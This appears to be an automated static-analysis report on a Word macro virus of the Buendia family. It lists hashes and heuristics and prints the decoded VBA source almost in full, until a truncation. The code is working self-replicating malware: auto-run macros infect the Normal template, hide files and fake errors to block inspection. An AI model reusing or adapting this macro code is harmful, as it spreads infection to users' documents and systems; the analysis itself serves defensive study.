Buendia — Office (OLE) malware analysis

Static analysis result for SHA-256 23751a1d36136127…

MALICIOUS

Office (OLE)

40.5 KB · Created: 1998-03-30 09:45:00 · Authoring application: Microsoft Word 8.0 · First seen: 2012-06-14
MD5: fc41d074effb32f0bbeaefd66dea11dd
SHA-1: f90d49285cd94ae07353e26c4b8c4b87313c1437
SHA-256: 23751a1d361361277328ae4a7bb791622d2c88c2a6c750ae0c89ff223f87aef1
Risk Score: 140

Malware Insights

Buendia · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro attempts to copy itself to the user's template directory, indicating a self-propagation mechanism. The ClamAV detection 'Doc.Trojan.Buendia-1' strongly suggests the Buendia family. The macro's intent is to spread itself by copying its template files.

Heuristics 3

  • VBA macros detected · medium · 1 related finding · OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro · high · OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker · medium · OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas · Kind: vba-macro · Source: oletools.olevba.extract_macros (decoded VBA source) · Size: 4140 bytes
SHA-256: fa50a1e79e6d76707990f4c6e91fff99166dc6511dacecd239590fc5f6f581b7
Detection
ClamAV: Doc.Trojan.Buendia-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Módulo21"
'               MACRO 21
'               ========
' Macro programmed and designed by RCH. It is
' meant to demonstrate that it is not so difficult
' to design a virus that spreads around.
'
' The joke of sending a message on the 11th
' is dedicated to my girlfriend, whom I started
' going out with on precisely an 11th
'
' This virus has no bad intentions, it only
' tries to spread and cheer up the world a little
'
'                            RCH
'                            ---
'
'

Sub AutoOpen()
On Error GoTo seguir
   FileCopy "a:\~wd11.tmp", Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp"
   SetAttr Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp", vbSystem + vbHidden
   FileCopy "a:\~wd11.tmp", Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp"
   SetAttr Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", vbSystem + vbHidden
   Options.SaveNormalPrompt = False
   Copiar_Macros
seguir:

On Error GoTo continua
ActiveDocument.AttachedTemplate = "~wd07.tmp"
continua:

Application.ShowVisualBasicEditor = False

End Sub
Sub Copiar_Macros()
On Error Resume Next
    Application.OrganizerCopy Source:="A:\~wd07.tmp", Destination:= _
        NormalTemplate.FullName, Name:= _
        "Módulo21", object:=wdOrganizerObjectProjectItems
Exit Sub
End Sub
Sub ArchivoNuevo()
On Error Resume Next
Documents.Add Template:= _
        Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp", _
        newtemplate:=False
End Sub
Sub ArchivoNuevoPredeter()
On Error Resume Next
    Documents.Add Template:= _
        Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp", _
        newtemplate:=False
End Sub
Sub AutoNew()
On Error Resume Next
If Documents.Count = 0 Then
    Documents.Add Template:= _
        Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp", _
        newtemplate:=False
End If
End Sub
Sub AutoExec()
On Error Resume Next
   FileCopy Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", "a:\~wd11.tmp"
If Err.Number <> 0 Then GoTo seguir
   SetAttr "a:\~wd11.tmp", vbSystem + vbHidden
   FileCopy Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", "a:\~wd07.tmp"
   SetAttr "a:\~wd07.tmp", vbSystem + vbHidden

seguir:
If Day(Date) = 11 Then
    MsgBox ("Hoy es un buen día " + Application.UserName)
    Application.OnTime When:=Now + TimeValue("00:01:00"), Name:="Mensaje"

End If

If Application.Documents.Count = 0 Then
    Documents.Add Template:= _
        "C:\Archivos de programa\Microsoft Office\Plantillas\~wd07.tmp", _
        newtemplate:=False
End If

End Sub

Sub AutoExit()
On Error Resume Next
   FileCopy Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", "a:\~wd11.tmp"
If Err.Number <> 0 Then GoTo fin
   SetAttr "a:\~wd11.tmp", vbSystem + vbHidden
   FileCopy Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", "a:\~wd07.tmp"
   SetAttr "a:\~wd07.tmp", vbSystem + vbHidden
fin:
End Sub
Sub ViewVBcode()
    a = MsgBox("No pudo encontrar o iniciar Microsoft Visual Basic.", vbExclamation)
End Sub

Sub HerramMacro()
    a = MsgBox("No pudo encontrar o iniciar Visor de Macros.", vbExclamation)
End Sub
Sub mensaje()
    a = MsgBox("Realmente hoy es un buen día", vbExclamation)
End Sub
Sub FileOpen()
On Error Resume Next
    AutoExit
    Dialogs(wdDialogFileOpen).Show
End Sub
Sub FileSaveAs()
On Error Resume Next
    AutoExit
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileSave()
On Error Resume Next
    AutoExit
    Application
... (truncated)